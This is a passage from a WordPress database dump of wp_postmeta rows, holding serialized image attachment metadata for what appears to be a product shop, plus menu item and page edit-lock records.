INSERT INTO `wp_postmeta` VALUES (140, 88, '_wp_attached_file', '2016/08/Sp.Solvents-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (141, 88, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3500;s:6:"height";i:2333;s:4:"file";s:25:"2016/08/Sp.Solvents-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"Sp.Solvents-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"Sp.Solvents-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"Sp.Solvents-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"Sp.Solvents-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"Sp.Solvents-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"Sp.Solvents-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"Sp.Solvents-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"Sp.Solvents-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (142, 89, '_wp_attached_file', '2016/08/Support-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (143, 89, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:450;s:6:"height";i:387;s:4:"file";s:21:"2016/08/Support-1.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"Support-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"Support-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"Support-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"Support-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (144, 90, '_wp_attached_file', '2016/08/VAZO-2-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (145, 90, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5905;s:6:"height";i:5905;s:4:"file";s:20:"2016/08/VAZO-2-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"VAZO-2-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"VAZO-2-2-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"VAZO-2-2-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"VAZO-2-2-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"VAZO-2-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"VAZO-2-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"VAZO-2-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"VAZO-2-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (146, 91, '_wp_attached_file', '2016/08/VAZO-4.jpg'); 
INSERT INTO `wp_postmeta` VALUES (147, 91, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3704;s:6:"height";i:3704;s:4:"file";s:18:"2016/08/VAZO-4.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"VAZO-4-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"VAZO-4-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"VAZO-4-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"VAZO-4-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"VAZO-4-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"VAZO-4-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"VAZO-4-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"VAZO-4-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (148, 35, '_edit_lock', '1471297507:1'); 
INSERT INTO `wp_postmeta` VALUES (149, 115, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (150, 115, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (151, 115, '_menu_item_object_id', '64'); 
INSERT INTO `wp_postmeta` VALUES (152, 115, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (153, 115, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (154, 115, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (155, 115, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (156, 115, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (158, 116, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (159, 116, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (160, 116, '_edit_lock', '1493646534:2'); 
INSERT INTO `wp_postmeta` VALUES (161, 118, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (162, 118, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (163, 118, '_edit_lock', '1493753904:2'); 
INSERT INTO `wp_postmeta` VALUES (164, 120, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (165, 120, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (166, 120, '_edit_lock', '1497377617:2'); 
INSERT INTO `wp_postmeta` VALUES (167, 122, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (168, 122, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (169, 122, '_edit_lock', '1489158630:2'); 
INSERT INTO `wp_postmeta` VALUES (188, 126, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (190, 126, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (192, 126, '_menu_item_object_id', '120'); 
INSERT INTO `wp_postmeta` VALUES (194, 126, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (196, 126, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (198, 126, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (200, 126, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (202, 126, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (207, 128, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (209, 128, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (211, 128, '_menu_item_object_id', '118'); 
INSERT INTO `wp_postmeta` VALUES (213, 128, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (215, 128, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (217, 128, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (219, 128, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (221, 128, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (225, 131, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (227, 131, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (229, 131, '_menu_item_object_id', '116'); 
INSERT INTO `wp_postmeta` VALUES (231, 131, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (233, 131, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (235, 131, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (237, 131, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (239, 131, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (260, 134, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (261, 134, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (262, 134, '_menu_item_object_id', '22'); 
INSERT INTO `wp_postmeta` VALUES (263, 134, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (264, 134, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (265, 134, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (266, 134, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (267, 134, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (269, 136, '_wp_attached_file', '2016/08/MEdical-1-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (270, 136, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:450;s:6:"height";i:320;s:4:"file";s:23:"2016/08/MEdical-1-2.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"MEdical-1-2-340x320.jpg";s:5:"width";i:340;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"MEdical-1-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"MEdical-1-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"MEdical-1-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (271, 137, '_wp_attached_file', '2016/08/PTFE-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (272, 137, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:1996;s:4:"file";s:24:"2016/08/PTFE-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"PTFE-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"PTFE-coating-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"PTFE-coating-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"PTFE-coating-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"PTFE-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"PTFE-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"PTFE-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"PTFE-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (273, 138, '_wp_attached_file', '2016/08/canstockphoto11467301.jpg'); 
INSERT INTO `wp_postmeta` VALUES (274, 138, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1600;s:6:"height";i:1600;s:4:"file";s:33:"2016/08/canstockphoto11467301.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto11467301-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto11467301-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto11467301-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto11467301-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto11467301-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto11467301-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto11467301-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (275, 139, '_wp_attached_file', '2016/08/canstockphoto16166183.jpg'); 
INSERT INTO `wp_postmeta` VALUES (276, 139, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1600;s:6:"height";i:1194;s:4:"file";s:33:"2016/08/canstockphoto16166183.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto16166183-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto16166183-800x597.jpg";s:5:"width";i:800;s:6:"height";i:597;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto16166183-768x573.jpg";s:5:"width";i:768;s:6:"height";i:573;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto16166183-1600x1194.jpg";s:5:"width";i:1600;s:6:"height";i:1194;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto16166183-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto16166183-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto16166183-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto16166183-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (277, 140, '_wp_attached_file', '2016/08/canstockphoto17561310.jpg'); 
INSERT INTO `wp_postmeta` VALUES (278, 140, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1600;s:6:"height";i:1066;s:4:"file";s:33:"2016/08/canstockphoto17561310.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto17561310-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto17561310-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto17561310-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto17561310-1600x1066.jpg";s:5:"width";i:1600;s:6:"height";i:1066;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto17561310-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto17561310-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto17561310-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto17561310-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (279, 141, '_wp_attached_file', '2016/08/canstockphoto17704348.jpg'); 
INSERT INTO `wp_postmeta` VALUES (280, 141, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1600;s:6:"height";i:1064;s:4:"file";s:33:"2016/08/canstockphoto17704348.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto17704348-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto17704348-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto17704348-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto17704348-1600x1064.jpg";s:5:"width";i:1600;s:6:"height";i:1064;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto17704348-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto17704348-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto17704348-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto17704348-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (281, 142, '_wp_attached_file', '2016/08/canstockphoto18567291.jpg'); 
INSERT INTO `wp_postmeta` VALUES (282, 142, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1600;s:6:"height";i:1066;s:4:"file";s:33:"2016/08/canstockphoto18567291.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto18567291-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto18567291-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto18567291-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto18567291-1600x1066.jpg";s:5:"width";i:1600;s:6:"height";i:1066;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto18567291-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto18567291-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto18567291-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto18567291-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (283, 143, '_wp_attached_file', '2016/08/canstockphoto20528720.jpg'); 
INSERT INTO `wp_postmeta` VALUES (284, 143, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1600;s:6:"height";i:1066;s:4:"file";s:33:"2016/08/canstockphoto20528720.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto20528720-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto20528720-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto20528720-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto20528720-1600x1066.jpg";s:5:"width";i:1600;s:6:"height";i:1066;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto20528720-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto20528720-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s